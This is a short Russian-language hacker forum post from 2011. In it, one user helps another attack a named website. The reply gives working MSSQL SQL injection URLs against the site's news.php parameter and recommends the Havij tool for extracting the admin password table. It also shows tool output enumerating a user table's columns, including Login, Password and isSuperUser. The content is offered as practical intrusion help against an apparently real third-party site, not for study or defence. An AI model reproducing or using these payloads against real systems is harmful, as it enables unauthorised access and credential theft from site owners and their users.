21.12.2011, 23:01
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от DarkMaster
Подскажите, здесь есть уязвимость, или только раскрытие путей:
saturn.net/contacts.php?id=4%27
уж больно пути странные пишет...
Только раскрытие путей.
Но имеются другие уязвимые параметры и они говорят, что стоит база MSSQL , например:
http://saturn.net/news.php?id=430+order+by+datalength(@@version)+--+
http://saturn.net/news.php?id=convert(int,db_name()+COLLATE+SQL_Lati n1_General_Cp1254_CS_AS)+and+1=1
а, дальше вбиваешь этот url в havij и раскручиваешь да таблицы с паролем от админки
Count(name) of syscolumns Where id=(SELECT id FROM sysobjects WHERE name=char(119)%2bchar(95)%2bchar(83)%2bchar(105)%2 bchar(116)%2bchar(101)%2bchar(85)%2bchar(115)%2bch ar(101)%2bchar(114)) is 6
Column found: FullName
Column found: id
Column found: isEnabled
Column found: isSuperUser
Column found: Login
Column found: Password
|
|
|